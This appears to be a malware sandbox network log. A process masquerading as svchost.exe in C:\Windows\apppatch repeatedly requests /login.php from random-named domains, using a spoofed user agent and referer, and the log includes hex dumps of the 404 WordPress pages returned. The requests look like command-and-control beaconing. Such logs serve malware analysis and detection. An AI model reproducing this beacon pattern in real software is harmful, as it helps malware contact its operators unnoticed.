                                                                                                                                                                                                          2024-09-08 08:53:57 UTC614INData Raw: 37 63 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7cbe<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC1369INData Raw: 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e
                                                                                                                                                                                                          Data Ascii: e><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qegyhig.
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC1369INData Raw: 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                          Data Ascii: ext(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(functio
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC1369INData Raw: 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72
                                                                                                                                                                                                          Data Ascii: }),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}retur
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC1369INData Raw: 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 6c 67 2d 70 61 64
                                                                                                                                                                                                          Data Ascii: s://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-slg-pad
                                                                                                                                                                                                          2024-09-08 08:53:57 UTC1369INData Raw: 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e
                                                                                                                                                                                                          Data Ascii: em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2em;fon


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.957350188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:54:06 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC896INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:07 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="41.7",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="16.6",amp_optimizer;dur="4.8"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uerRVSqKt9lueXUYBU1HDW%2F7kPvuN196fpS15TKckOB7Cvm6G1a7GPXqG%2BvykSHqiP6vN1i8ivaCpi29YXa4hfAEx2JRsvh1xIB4zkXPq5EXeDBH508UYot9dCDdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb6447bf543df-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC473INData Raw: 37 63 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c31<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 7a
                                                                                                                                                                                                          Data Ascii: >html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-siz
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69
                                                                                                                                                                                                          Data Ascii: lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hi
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 74 65 78 74
                                                                                                                                                                                                          Data Ascii: kground{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>text
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c
                                                                                                                                                                                                          Data Ascii: ht]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 66 74 3a
                                                                                                                                                                                                          Data Ascii: t-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d
                                                                                                                                                                                                          Data Ascii: ]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height]
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66
                                                                                                                                                                                                          Data Ascii: lay:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;lef
                                                                                                                                                                                                          2024-09-08 08:54:07 UTC1369INData Raw: 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63
                                                                                                                                                                                                          Data Ascii: [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordion>sec


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.957351188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:54:08 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC904INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:09 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="20.5",amp_tag_and_attribute_sanitizer;dur="18.5",amp_optimizer;dur="4.0"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIX8x1dmnG5It6Kp6CiEM0LW%2BKc50WoLptehkIP0i06IHQ7yHjWWtnpyYF0OvrljK7OVBD7fC0HSM97fQzsp4cnEDx%2BbZf%2Fjc4aU%2Fkq%2B3fseHaoX5y%2FWYbiaJOAkhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb64e384a42f5-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:54:09 UTC465INData Raw: 37 63 32 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c29<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
